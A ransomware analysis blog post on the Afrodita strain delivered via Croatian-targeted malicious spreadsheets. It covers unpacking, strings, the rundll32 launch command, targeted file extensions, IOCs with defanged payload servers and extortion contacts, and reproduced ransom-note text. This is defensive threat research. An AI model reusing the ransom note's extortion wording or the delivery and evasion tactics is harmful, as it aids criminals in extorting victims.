<span class="nv">will</span> <span class="nv">receive</span> <span class="nv">your</span> <span class="nv">private</span> <span class="nv">key</span>.
<span class="nv">Approximate</span> <span class="nv">destruction</span> <span class="nv">time</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">private</span> <span class="nv">key</span> <span class="s1">'</span><span class="s"> + tillDate + </span><span class="s1">'</span>
<span class="nv">How</span> <span class="nv">to</span> <span class="nv">buy</span> <span class="nv">bitcoins</span>
<span class="nv">Xchange</span>.<span class="nv">cash</span>
<span class="mi">24</span><span class="nv">paybank</span>.<span class="nv">com</span>
<span class="nv">Change</span>.<span class="nv">me</span>
<span class="nv">Kassa</span>.<span class="nv">cc</span>
<span class="nv">Change</span>.<span class="nv">am</span>
<span class="nv">Coinbase</span>.<span class="nv">com</span>
<span class="nv">more</span> <span class="nv">options</span>
<span class="nv">Bestchange</span>.<span class="nv">com</span>
</pre></div>
<p></br></p>Not so nice after all - Afrodita Ransomware2020-01-09T00:00:00+01:002020-01-09T00:00:00+01:00f0wLtag:dissectingmalwa.re,2020-01-09:/not-so-nice-after-all-afrodita-ransomware.html<p>A new Ransomware strain spread by malicious Office documents targeted at Croatian systems - let's check it out</p><p><center><img alt="Logo" src="https://dissectingmalwa.re/img/afro-logo.png"></center></p>
<p></br></p>
<p>This strain was first discovered by Korben Dallas on Twitter on the 9th of January. As I already mentioned the Malware is delivered via a Malspam/Maldoc attack crafted for Users / Companies from Croatia. Researchers that were involved in the initial analysis: <a href="https://twitter.com/KorbenD_Intel">@KorbenD_Intel</a>, <a href="https://twitter.com/James_inthe_box">@James_inthe_box</a>, <a href="https://twitter.com/Malwageddon">@Malwageddon</a>, <a href="https://twitter.com/pollo290987">@pollo290987</a> and I (<a href="https://twitter.com/f0wlsec">@f0wlsec</a>). Thank you for your contributions!</p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/James_inthe_box?ref_src=twsrc%5Etfw">@James_inthe_box</a> <a href="https://twitter.com/malwrhunterteam?ref_src=twsrc%5Etfw">@malwrhunterteam</a> <a href="https://twitter.com/Malwageddon?ref_src=twsrc%5Etfw">@Malwageddon</a> <br>69450923d812f3696e8280508b636955 XLS 12/60 VT scan detections. Not nice.. upped to Malshare: <a href="https://t.co/jXxXrJxcB9">https://t.co/jXxXrJxcB9</a> <a href="https://t.co/TPfP0BCZOB">pic.twitter.com/TPfP0BCZOB</a></p>— Korben Dallas (@KorbenD_Intel) <a href="https://twitter.com/KorbenD_Intel/status/1215385296537358343?ref_src=twsrc%5Etfw">January 9, 2020</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p></br></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>Afrodita @ <a href="https://app.any.run/tasks/ba401399-4714-4b94-9208-b08351ff0220">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b?environmentId=100">HybridAnalysis</a>
--> <code>sha256 9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b</code></p>
<p></br></p>
<p>Here you can see three images extracted from the malicious Excel Docs. Funny how they didn't even bother to think of a fake company name for the second Logo :D</p>
<p><center><img alt="Sleep Meme" height="450px" width="360px" src="https://dissectingmalwa.re/img/afro-maldoc.png"></center></p>
<p><br/></p>
<p>Afrodita uses a sleep routine for Sandbox evasion. In my Tests it took 30-60mins until the system was infected.</p>
<p><center><img alt="Sleep Meme" height="450px" width="360px" src="https://dissectingmalwa.re/img/afro-meme.png"></center></p>
<p><br/></p>
<p>After unpacking the sample with UPX, <em>Detect it easy</em> returns the following:</p>
<p><center><img alt="Detect it easy" height="450px" width="360px" src="https://dissectingmalwa.re/img/afro-die.png"></center></p>
<p><center>It was likely build with a very new Version of Visual Studio (2019)</center></p>
<p><br/></p>
<p>Below you can see a screenshot of PEBear from the Imports-Tab.</p>
<p><center><img alt="PEBear Imports" height="450px" width="360px" src="https://dissectingmalwa.re/img/afro-imports.png"></center></p>
<p><br/></p>
<p>The extracted strings tell us quite a lot in this case. It looks like the internal name of the Project is <em>Afrodita</em> and it utilizes the CryptoPP Library. There are some references to .key files, but I haven't found a path or file on a infected machine yet. <strong>README_RECOVERY</strong> <strong>.txt</strong> is will be the filename of the Ransomnote. It's contents are embeded in the binary's .data section with Base64 encoding. Lastly <em>Afrodita.dll</em> is the rewritten file that is downloaded as a payload (originally notnice.jpg or verynice.jpg). It's executed via <strong>rundll32.exe Afrodita.dll,Sura</strong>.</p>
<p></br></p>
<p><center><img alt="Strings" src="https://dissectingmalwa.re/img/afro-strings.png"></center></p>
<p><br/></p>
<p>The following filetypes will be encrypted by Afrodita:</p>
<div class="highlight"><pre><span></span><span class="na">.TXT</span><span class="p">,</span> <span class="no">.ZIP</span><span class="p">,</span> <span class="no">.DAT</span><span class="p">,</span> <span class="no">.JPE</span><span class="p">,</span> <span class="no">.JPG</span><span class="p">,</span> <span class="no">.PNG</span><span class="p">,</span> <span class="no">.JPEG</span><span class="p">,</span> <span class="no">.GIF</span><span class="p">,</span> <span class="no">.BMP</span><span class="p">,</span> <span class="no">.EXIF</span><span class="p">,</span> <span class="no">.MP4</span><span class="p">,</span> <span class="no">.RAR</span><span class="p">,</span> <span class="no">.M4A</span><span class="p">,</span> <span class="no">.WMA</span><span class="p">,</span> <span class="no">.AVI</span><span class="p">,</span> <span class="no">.WMV</span><span class="p">,</span> <span class="no">.MKV</span><span class="p">,</span> <span class="no">.CSV</span><span class="p">,</span> <span class="no">.M3U</span><span class="p">,</span> <span class="no">.FLV</span><span class="p">,</span> <span class="no">.WALLET</span><span class="p">,</span> <span class="no">.JAVA</span><span class="p">,</span> <span class="no">.CLASS</span><span class="p">,</span> <span class="no">.HTML</span><span class="p">,</span> <span class="no">.HTM</span><span class="p">,</span> <span class="no">.CSS</span><span class="p">,</span> <span class="no">.LUA</span><span class="p">,</span> <span class="no">.ASP</span><span class="p">,</span> <span class="no">.PHP</span><span class="p">,</span> <span class="no">.INCPAS</span><span class="p">,</span> <span class="no">.ASM</span><span class="p">,</span> <span class="no">.HPP</span><span class="p">,</span> <span class="no">.CPP</span><span class="p">,</span> <span class="no">.SLN</span><span class="p">,</span> <span class="no">.ACCDB</span><span class="p">,</span> <span class="no">.MDB</span><span class="p">,</span> <span class="no">.PPTM</span><span class="p">,</span> <span class="no">.PPTX</span><span class="p">,</span> <span class="no">.PPT</span><span class="p">,</span> <span class="no">.XLK</span><span class="p">,</span> <span class="no">.XLSB</span><span class="p">,</span> <span class="no">.XLSM</span><span class="p">,</span> <span class="no">.XLSX</span><span class="p">,</span> <span class="no">.XLS</span><span class="p">,</span> <span class="no">.WPS</span><span class="p">,</span> <span class="no">.DOCM</span><span class="p">,</span> <span class="no">.DOCX</span><span class="p">,</span> <span class="no">.DOC</span><span class="p">,</span> <span class="no">.ODB</span><span class="p">,</span> <span class="no">.ODC</span><span class="p">,</span> <span class="no">.ODM</span><span class="p">,</span> <span class="no">.ODP</span><span class="p">,</span> <span class="no">.ODS</span><span class="p">,</span> <span class="no">.ACCDR</span><span class="p">,</span> <span class="no">.ACCDT</span><span class="p">,</span> <span class="no">.ACCDE</span><span class="p">,</span> <span class="no">.D3DBSP</span><span class="p">,</span> <span class="no">.SIE</span><span class="p">,</span> <span class="no">.SQL</span><span class="p">,</span> <span class="no">.BACKUPDB</span><span class="p">,</span> <span class="no">.BACKUP</span><span class="p">,</span> <span class="no">.BAK</span><span class="p">,</span> <span class="no">.SUM</span><span class="p">,</span> <span class="no">.IBANK</span><span class="p">,</span> <span class="no">.T13</span><span class="p">,</span> <span class="no">.T12</span><span class="p">,</span> <span class="no">.QDF</span><span class="p">,</span> <span class="no">.GDB</span><span class="p">,</span> <span class="no">.TAX</span><span class="p">,</span> <span class="no">.PKPASS</span><span class="p">,</span> <span class="no">.SLDM</span><span class="p">,</span> <span class="no">.SLDX</span><span class="p">,</span> <span class="no">.PPSM</span><span class="p">,</span> <span class="no">.PPSX</span><span class="p">,</span> <span class="no">.PPAM</span><span class="p">,</span> <span class="no">.POTM</span><span class="p">,</span> <span class="no">.POTX</span><span class="p">,</span> <span class="no">.PPS</span><span class="p">,</span> <span class="no">.POT</span><span class="p">,</span> <span class="no">.XLW</span><span class="p">,</span> <span class="no">.XLL</span><span class="p">,</span> <span class="no">.XLAM</span><span class="p">,</span> <span class="no">.XLA</span><span class="p">,</span> <span class="no">.XLTM</span><span class="p">,</span> <span class="no">.XLTX</span><span class="p">,</span> <span class="no">.XLM</span><span class="p">,</span> <span class="no">.XLT</span><span class="p">,</span> <span class="no">.DOTM</span><span class="p">,</span> <span class="no">.DOTX</span><span class="p">,</span> <span class="no">.DOT</span><span class="p">,</span> <span class="no">.BC6</span><span class="p">,</span> <span class="no">.BC7</span><span class="p">,</span> <span class="no">.BKP</span><span class="p">,</span> <span class="no">.QIC</span><span class="p">,</span> <span class="no">.BKF</span><span class="p">,</span> <span class="no">.SIDN</span><span class="p">,</span> <span class="no">.SIDD</span><span class="p">,</span> <span class="no">.MDDATA</span><span class="p">,</span> <span class="no">.ITL</span><span class="p">,</span> <span class="no">.ITDB</span><span class="p">,</span> <span class="no">.ICXS</span><span class="p">,</span> <span class="no">.HVPL</span><span class="p">,</span> <span class="no">.HPLG</span><span class="p">,</span> <span class="no">.HKDB</span><span class="p">,</span> <span class="no">.MDBACKUP</span><span class="p">,</span> <span class="no">.SYNCDB</span><span class="p">,</span> <span class="no">.GHO</span><span class="p">,</span> <span class="no">.CAS</span><span class="p">,</span> <span class="no">.SVG</span><span class="p">,</span> <span class="no">.MAP</span><span class="p">,</span> <span class="no">.WMO</span><span class="p">,</span> <span class="no">.ITM</span><span class="p">,</span> <span class="no">.FOS</span><span class="p">,</span> <span class="no">.MOV</span><span class="p">,</span> <span class="no">.VDF</span><span class="p">,</span> <span class="no">.ZTMP</span><span class="p">,</span> <span class="no">.SIS</span><span class="p">,</span> <span class="no">.SID</span><span class="p">,</span> <span class="no">.NCF</span><span class="p">,</span> <span class="no">.MENU</span><span class="p">,</span> <span class="no">.LAYOUT</span><span class="p">,</span> <span class="no">.DMP</span><span class="p">,</span> <span class="no">.BLOB</span><span class="p">,</span> <span class="no">.ESM</span><span class="p">,</span> <span class="no">.VCF</span><span class="p">,</span> <span class="no">.VTF</span><span class="p">,</span> <span class="no">.DAZIP</span><span class="p">,</span> <span class="no">.FPK</span><span class="p">,</span> <span class="no">.MLX</span><span class="p">,</span> <span class="no">.IWD</span><span class="p">,</span> <span class="no">.VPK</span><span class="p">,</span> <span class="no">.TOR</span><span class="p">,</span> <span class="no">.PSK</span><span class="p">,</span> <span class="no">.RIM</span><span class="p">,</span> <span class="no">.W3X</span><span class="p">,</span> <span class="no">.FSH</span><span class="p">,</span> <span class="no">.NTL</span><span class="p">,</span> <span class="no">.ARCH00</span><span class="p">,</span> <span class="no">.LVL</span><span class="p">,</span> <span class="no">.SNX</span><span class="p">,</span> <span class="no">.CFR</span><span class="p">,</span> <span class="no">.VPP_PC</span><span class="p">,</span> <span class="no">.LRF</span><span class="p">,</span> <span class="no">.MCMETA</span><span class="p">,</span> <span class="no">.VFS0</span><span class="p">,</span> <span class="no">.MPQGE</span><span class="p">,</span> <span class="no">.KDB</span><span class="p">,</span> <span class="no">.DB0</span><span class="p">,</span> <span class="no">.DBA</span><span class="p">,</span> <span class="no">.ROFL</span><span class="p">,</span> <span class="no">.HKX</span><span class="p">,</span> <span class="no">.BAR.</span> <span class="no">.UPK</span><span class="p">,</span> <span class="no">.DAS</span><span class="p">,</span> <span class="no">.IWI</span><span class="p">,</span> <span class="no">.LITEMOD</span><span class="p">,</span> <span class="no">.ASSET</span><span class="p">,</span> <span class="no">.FORGE</span><span class="p">,</span> <span class="no">.LTX</span><span class="p">,</span> <span class="no">.BSA</span><span class="p">,</span> <span class="no">.APK</span><span class="p">,</span> <span class="no">.RE4</span><span class="p">,</span> <span class="no">.SAV</span><span class="p">,</span> <span class="no">.LBF</span><span class="p">,</span> <span class="no">.SLM</span><span class="p">,</span> <span class="no">.BIK</span><span class="p">,</span> <span class="no">.EPK</span><span class="p">,</span> <span class="no">.RGSS3A</span><span class="p">,</span> <span class="no">.PAK</span><span class="p">,</span> <span class="no">.BIG</span><span class="p">,</span> <span class="no">.WOTREPLAY</span><span class="p">,</span> <span class="no">.XXX</span><span class="p">,</span> <span class="no">.DESC</span><span class="p">,</span> <span class="no">.P7C</span><span class="p">,</span> <span class="no">.P7B</span><span class="p">,</span> <span class="no">.P12</span><span class="p">,</span> <span class="no">.PFX</span><span class="p">,</span> <span class="no">.PEM</span><span class="p">,</span> <span class="no">.CRT</span><span class="p">,</span> <span class="no">.CER</span><span class="p">,</span> <span class="no">.DER</span><span class="p">,</span> <span class="no">.X3F</span><span class="p">,</span> <span class="no">.SRW</span><span class="p">,</span> <span class="no">.PEF</span><span class="p">,</span> <span class="no">.PTX</span><span class="p">,</span> <span class="no">.R3D</span><span class="p">,</span> <span class="no">.RW2</span><span class="p">,</span> <span class="no">.RWL</span><span class="p">,</span> <span class="no">.RAW</span><span class="p">,</span> <span class="no">.RAF</span><span class="p">,</span> <span class="no">.ORF</span><span class="p">,</span> <span class="no">.NRW</span><span class="p">,</span> <span class="no">.MRWREF</span><span class="p">,</span> <span class="no">.MEF</span><span class="p">,</span> <span class="no">.ERF</span><span class="p">,</span> <span class="no">.KDC</span><span class="p">,</span> <span class="no">.DCR</span><span class="p">,</span> <span class="no">.CR2</span><span class="p">,</span> <span class="no">.CRW</span><span class="p">,</span> <span class="no">.BAY</span><span class="p">,</span> <span class="no">.SR2</span><span class="p">,</span> <span class="no">.SRF</span><span class="p">,</span> <span class="no">.ARW</span><span class="p">,</span> <span class="no">.3FR</span><span class="p">,</span> <span class="no">.DNG</span><span class="p">,</span> <span class="no">.CDR</span><span class="p">,</span> <span class="no">.INDD</span><span class="p">,</span> <span class="no">.EPS</span><span class="p">,</span> <span class="no">.PDF</span><span class="p">,</span> <span class="no">.PDD</span><span class="p">,</span> <span class="no">.PSD</span><span class="p">,</span> <span class="no">.DBF</span><span class="p">,</span> <span class="no">.MDF</span><span class="p">,</span> <span class="no">.WB2</span><span class="p">,</span> <span class="no">.RTF</span><span class="p">,</span> <span class="no">.WPD</span><span class="p">,</span> <span class="no">.DXG</span><span class="p">,</span> <span class="no">.DWG</span><span class="p">,</span> <span class="no">.PST</span><span class="p">,</span> <span class="no">.ODT</span><span class="p">,</span> <span class="no">.DXF</span><span class="p">,</span> <span class="no">.MP3</span><span class="p">,.</span><span class="no">MRW</span><span class="p">,</span> <span class="no">.NEF</span><span class="p">,</span> <span class="no">.JFIF</span><span class="p">,</span> <span class="no">.DRF</span><span class="p">,</span> <span class="no">.BLEND</span><span class="p">,</span> <span class="no">.APJ</span><span class="p">,</span> <span class="no">.3DS</span><span class="p">,</span> <span class="no">.SDA</span><span class="p">,</span> <span class="no">.PAT</span><span class="p">,</span> <span class="no">.FXG</span><span class="p">,</span> <span class="no">.FHD</span><span class="p">,</span> <span class="no">.DXB</span><span class="p">,</span> <span class="no">.DRW</span><span class="p">,</span> <span class="no">.DESIGN</span><span class="p">,</span> <span class="no">.DDRW</span><span class="p">,</span> <span class="no">.DDOC</span><span class="p">,</span> <span class="no">.DCS</span><span class="p">,</span> <span class="no">.CSL</span><span class="p">,</span> <span class="no">.CSH</span><span class="p">,</span> <span class="no">.CPI</span><span class="p">,</span> <span class="no">.CGM</span><span class="p">,</span> <span class="no">.CDX</span><span class="p">,</span> <span class="no">.CDRW</span><span class="p">,</span> <span class="no">.CDR6</span><span class="p">,</span> <span class="no">.CDR5</span><span class="p">,</span> <span class="no">.CDR4</span><span class="p">,</span> <span class="no">.CDR3</span><span class="p">,</span> <span class="no">.AWG</span><span class="p">,</span> <span class="no">.AIT</span><span class="p">,</span> <span class="no">.AGD1</span><span class="p">,</span> <span class="no">.YCBCRA</span><span class="p">,</span> <span class="no">.STX</span><span class="p">,</span> <span class="no">.ST8</span><span class="p">,</span> <span class="no">.ST7</span><span class="p">,</span> <span class="no">.ST6</span><span class="p">,</span> <span class="no">.ST5</span><span class="p">,</span> <span class="no">.ST4</span><span class="p">,</span> <span class="no">.SD1</span><span class="p">,</span> <span class="no">.SD0</span><span class="p">,</span> <span class="no">.RWZ</span><span class="p">,</span> <span class="no">.RA2</span><span class="p">,</span> <span class="no">.PCD</span><span class="p">,</span> <span class="no">.NWB</span><span class="p">,</span> <span class="no">.NOP</span><span class="p">,</span> <span class="no">.NDD</span><span class="p">,</span> <span class="no">.MOS</span><span class="p">,</span> <span class="no">.MFW</span><span class="p">,</span> <span class="no">.MDC</span><span class="p">,</span> <span class="no">.KC2</span><span class="p">,</span> <span class="no">.IIQ</span><span class="p">,</span> <span class="no">.GRY</span><span class="p">,</span> <span class="no">.GREY</span><span class="p">,</span> <span class="no">.GRAY</span><span class="p">,</span> <span class="no">.FPX</span><span class="p">,</span> <span class="no">.FFF</span><span class="p">,</span> <span class="no">.EXF</span><span class="p">,</span> <span class="no">.DC2</span><span class="p">,</span> <span class="no">.CRAW</span><span class="p">,</span> <span class="no">.CMT</span><span class="p">,</span> <span class="no">.CIB</span><span class="p">,</span> <span class="no">.CE2</span><span class="p">,</span> <span class="no">.CE1</span><span class="p">,</span> <span class="no">.3PR</span><span class="p">,</span> <span class="no">.MPG</span><span class="p">,</span> <span class="no">.SQLITEDB</span><span class="p">,</span> <span class="no">.SQLITE3</span><span class="p">,</span> <span class="no">.SQLITE</span><span class="p">,</span> <span class="no">.SDF</span><span class="p">,</span> <span class="no">.SAS7BDAT</span><span class="p">,</span> <span class="no">.S3DB</span><span class="p">,</span> <span class="no">.RDB</span><span class="p">,</span> <span class="no">.PSAFE3</span><span class="p">,</span> <span class="no">.NYF</span><span class="p">,</span> <span class="no">.NX2</span><span class="p">,</span> <span class="no">.NX1</span><span class="p">,</span> <span class="no">.NSH</span><span class="p">,</span> <span class="no">.NSG</span><span class="p">,</span> <span class="no">.NSF</span><span class="p">,</span> <span class="no">.NSD</span><span class="p">,</span> <span class="no">.NS4</span><span class="p">,</span> <span class="no">.NS3</span><span class="p">,</span> <span class="no">.NS2</span><span class="p">,</span> <span class="no">.MYD</span><span class="p">,</span> <span class="no">.KPDX</span><span class="p">,</span> <span class="no">.KDBX</span><span class="p">,</span> <span class="no">.IDX</span><span class="p">,</span> <span class="no">.IBZ</span><span class="p">,</span> <span class="no">.IBD</span><span class="p">,</span> <span class="no">.FDB</span><span class="p">,</span> <span class="no">.ERBSQL</span><span class="p">,</span> <span class="no">.DB3</span><span class="p">,</span> <span class="no">.DB-JOURNAL</span><span class="p">,</span> <span class="no">.CLS</span><span class="p">,</span> <span class="no">.BDB</span><span class="p">,</span> <span class="no">.ADB</span><span class="p">,</span> <span class="no">.MONEYWELL</span><span class="p">,</span> <span class="no">.MMW</span><span class="p">,</span> <span class="no">.HBK</span><span class="p">,</span> <span class="no">.FFD</span><span class="p">,</span> <span class="no">.DGC</span><span class="p">,</span> <span class="no">.DDD</span><span class="p">,</span> <span class="no">.DAC</span><span class="p">,</span> <span class="no">.CFP</span><span class="p">,</span> <span class="no">.CDF</span><span class="p">,</span> <span class="no">.BPW</span><span class="p">,</span> <span class="no">.BGT</span><span class="p">,</span> <span class="no">.ACR</span><span class="p">,</span> <span class="no">.AC2</span><span class="p">,</span> <span class="no">.AB4</span><span class="p">,</span> <span class="no">.DJVU</span><span class="p">,</span> <span class="no">.SXM</span><span class="p">,</span> <span class="no">.ODF</span><span class="p">,</span> <span class="no">.MSG</span><span class="p">,</span> <span class="no">.STD</span><span class="p">,</span> <span class="no">.SXD</span><span class="p">,</span> <span class="no">.OTG</span><span class="p">,</span> <span class="no">.STI</span><span class="p">,</span> <span class="no">.SXI</span><span class="p">,</span> <span class="no">.OTP</span><span class="p">,</span> <span class="no">.ODG</span><span class="p">,</span> <span class="no">.STC</span><span class="p">,</span> <span class="no">.SXC</span><span class="p">,</span> <span class="no">.OTS</span><span class="p">,</span> <span class="no">.SXG</span><span class="p">,</span> <span class="no">.STW</span><span class="p">,</span> <span class="no">.SXW</span><span class="p">,</span> <span class="no">.OTH</span><span class="p">,</span> <span class="no">.OTT</span>
</pre></div>
<p></br></p>
<p>The Ransomware encrypts the first 512 Bytes of the File Header which will render most filetypes useless. It does not leave any Signature in the data of the files and neither does it append a custom extension to the filename.</p>
<p><center><img alt="File" src="https://dissectingmalwa.re/img/afro-file.png"></center></p>
<p><br/></p>
<p>Another IOC: It creates the following Mutex: <em>835821AM3218SAZ</em></p>
<p><center><img alt="Mutex" src="https://dissectingmalwa.re/img/afro-mutex.png"></center></p>
<p><br/></p>
<h2><strong>Update 10.01.2020:</strong></h2>
<p>The criminals obviously failed to properly display the key / victim ID in the Ransomnote. This was also a problem because the screwed encoding killed this Blogs Atom RSS Feed :D To resolve this issue I removed the malformed section from this page. If you want to have a look at the original note plus a couple of encrypted jpegs, download the <a href="https://dissectingmalwa.re/other/afrodita-samplefiles.zip">zip</a> file.</p>
<p>Also this Malware family isn't as new as I originally thought. According to Michael Gillespie the MalwareHunterTeam found the first Maldoc in Late November. A few days later Checkpoint research found it as well:</p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/Afrodita?src=hash&ref_src=twsrc%5Etfw">#Afrodita</a> Ransomware, appears to be a new strain.<br>Targeting businesses in Croatia via legitimate looking Excel spreadsheets.<br><br>Subject: βPoziv na placanjeβ<br>DZ: http://content-delivery[.]in/verynice.jpg<br>XLSM: 597ec6887f3bcdc5077939bdf1fb69f1<br>DLL: ebacbff99234887d9f27719e48bafe59 <a href="https://t.co/IM0h4fHUDT">pic.twitter.com/IM0h4fHUDT</a></p>— Check Point Research (@<em>CPResearch</em>) <a href="https://twitter.com/_CPResearch_/status/1201957880909484033?ref_src=twsrc%5Etfw">December 3, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p></br></p>
<p>Today Michael also asked if anyone was able to parse the <em>main-public.key</em> because the format seems off. I extracted it from the binary:</p>
<p><center><img alt="Mutex" src="https://dissectingmalwa.re/img/afro-mainpub.png"></center></p>
<p><br/></p>
<p>A quick look into the <a href="https://www.cryptopp.com/wiki/Keys_and_Formats#Hex_and_Base64_Encoding">CryptoPP Wiki</a> revealed that the key was in raw (uncooked) ASN.1 format (you can identify it by hex 30 82). Using an online ASN.1 decoder (<a href="https://lapo.it/asn1js/https://lapo.it/asn1js/">Link</a>) yields us the public key:</p>
<p><center><img alt="Mutex" src="https://dissectingmalwa.re/img/afro.key.png"></center></p>
<p><br/></p>
<div class="highlight"><pre><span></span><span class="o">-----</span><span class="nv">BEGIN</span> <span class="nv">RSA</span> <span class="nv">PUBLIC</span> <span class="nv">KEY</span><span class="o">-----</span>
<span class="nv">MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAxs2xkeHRygZBupFc2</span><span class="o">+</span><span class="nv">Z</span><span class="o">//</span><span class="nv">dLnMbWR</span><span class="o">/</span><span class="nv">NiXQBmP</span>
<span class="mi">10</span><span class="nv">Q7nbG</span><span class="o">/</span><span class="mi">5</span><span class="nv">jaDcik</span><span class="o">+</span><span class="nv">eGDh2zz6XYr2Ur</span><span class="o">+</span><span class="nv">sS1yD4</span><span class="o">/</span><span class="mi">1</span><span class="nv">XQeIZ</span><span class="o">/</span><span class="nv">zjcjC43H090nUlELTtq9ED8LqevnrOaMQFy</span>
<span class="nv">UIhQU</span><span class="o">+</span><span class="nv">plY5eJd6KuW2dCdv8n0uBDAzBQRnpjJr0AmnkEzRGD5XCoYtrR061kBAerXQjBxhQSnsMWxE2R</span>
<span class="nv">excq38tgf</span><span class="o">/</span><span class="nv">szXPaoSD1vsSmIwXbc3nTkadYPfjLu6aWWYmikWIi3z</span><span class="o">+</span><span class="nv">RoUOm7OhmaOu</span><span class="o">+</span><span class="nv">azPCPBjHc93cB</span>
<span class="nv">KsLnxzSHiKRFN4cd0Tu</span><span class="o">+</span><span class="nv">uvehGl1</span><span class="o">+</span><span class="nv">v3CK0Zj</span><span class="o">+</span><span class="nv">nr5OfeNjMGYQj80t0</span><span class="o">+</span><span class="nv">AqnDQkzwdA</span><span class="o">/</span><span class="nv">wIBEQ</span><span class="o">==</span>
<span class="o">-----</span><span class="k">END</span> <span class="nv">RSA</span> <span class="nv">PUBLIC</span> <span class="nv">KEY</span><span class="o">-----</span>
</pre></div>
<p><br/></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1114</em> --> Email Collection --> Collection</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Afrodita</h3>
<div class="highlight"><pre><span></span><span class="n">notnice</span><span class="p">.</span><span class="n">jpg</span> <span class="c1">--> SHA256: 9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">6144</span><span class="p">:</span><span class="n">EXrm0zIiAhjC7Cqa5ZhiIJDQ13Xdksm1Cx2tJk</span><span class="p">:</span><span class="n">EbNQaCq6iIJcdksmJtJ</span>
</pre></div>
<h3>Payload Servers</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">riskpartner</span><span class="p">[.]</span><span class="n">hr</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">content</span><span class="o">/</span><span class="n">notnice</span><span class="p">.</span><span class="n">jpg</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">content</span><span class="o">-</span><span class="n">delivery</span><span class="p">[.]</span><span class="k">in</span><span class="o">/</span><span class="n">verynice</span><span class="p">.</span><span class="n">jpg</span>
</pre></div>
<h3>E-Mail Addresses / Contact</h3>
<div class="highlight"><pre><span></span><span class="n">afroditateam</span><span class="nv">@tutanota</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="n">afroditasupport</span><span class="nv">@mail2tor</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="nl">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">t</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">me</span><span class="o">/</span><span class="n">RecoverySupport</span><span class="w"></span>
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre><span></span><span class="o">~~~</span> <span class="nv">Greetings</span> <span class="o">~~~</span>
[<span class="o">+</span>] <span class="nv">What</span> <span class="nv">has</span> <span class="nv">happened</span>? [<span class="o">+</span>]
<span class="nv">Your</span> <span class="nv">files</span> <span class="nv">are</span> <span class="nv">encrypted</span>, <span class="nv">and</span> <span class="nv">currently</span> <span class="nv">unavailable</span>. <span class="nv">You</span> <span class="nv">are</span> <span class="nv">free</span> <span class="nv">to</span> <span class="nv">check</span>.
<span class="nv">Every</span> <span class="nv">file</span> <span class="nv">is</span> <span class="nv">recoverable</span> <span class="nv">by</span> <span class="nv">following</span> <span class="nv">our</span> <span class="nv">instructions</span> <span class="nv">below</span>.
<span class="nv">Encryption</span> <span class="nv">algorithms</span> <span class="nv">used</span>: <span class="nv">AES256</span><span class="ss">(</span><span class="nv">CBC</span><span class="ss">)</span> <span class="o">+</span> <span class="nv">RSA2048</span> <span class="ss">(</span><span class="nv">military</span><span class="o">/</span><span class="nv">government</span> <span class="nv">grade</span><span class="ss">)</span>.
[<span class="o">+</span>] <span class="nv">Guarantees</span>? [<span class="o">+</span>]
<span class="nv">This</span> <span class="nv">is</span> <span class="nv">our</span> <span class="nv">daily</span> <span class="nv">job</span>. <span class="nv">We</span> <span class="nv">are</span> <span class="nv">not</span> <span class="nv">here</span> <span class="nv">to</span> <span class="nv">lie</span> <span class="nv">to</span> <span class="nv">you</span> <span class="o">-</span> <span class="nv">as</span> <span class="nv">you</span> <span class="nv">are</span> <span class="mi">1</span> <span class="nv">of</span> <span class="mi">10000</span><span class="s1">'</span><span class="s">s.</span>
<span class="nv">Our</span> <span class="nv">only</span> <span class="nv">interest</span> <span class="nv">is</span> <span class="nv">in</span> <span class="nv">us</span> <span class="nv">getting</span> <span class="nv">payed</span> <span class="nv">and</span> <span class="nv">you</span> <span class="nv">getting</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">back</span>.
<span class="k">If</span> <span class="nv">we</span> <span class="nv">were</span> <span class="nv">not</span> <span class="nv">able</span> <span class="nv">to</span> <span class="nv">decrypt</span> <span class="nv">the</span> <span class="nv">data</span>, <span class="nv">other</span> <span class="nv">people</span> <span class="nv">in</span> <span class="nv">same</span> <span class="nv">situation</span> <span class="nv">as</span> <span class="nv">you</span>
<span class="nv">wouldn</span><span class="s1">'</span><span class="s">t trust us and that would be bad for our buissness --</span>
<span class="nv">So</span> <span class="nv">it</span><span class="s1">'</span><span class="s">s not in our interest.</span>
<span class="nv">To</span> <span class="nv">prove</span> <span class="nv">our</span> <span class="nv">ability</span> <span class="nv">to</span> <span class="nv">decrypt</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">you</span> <span class="nv">have</span> <span class="mi">1</span> <span class="nv">file</span> <span class="nv">free</span> <span class="nv">decryption</span>.
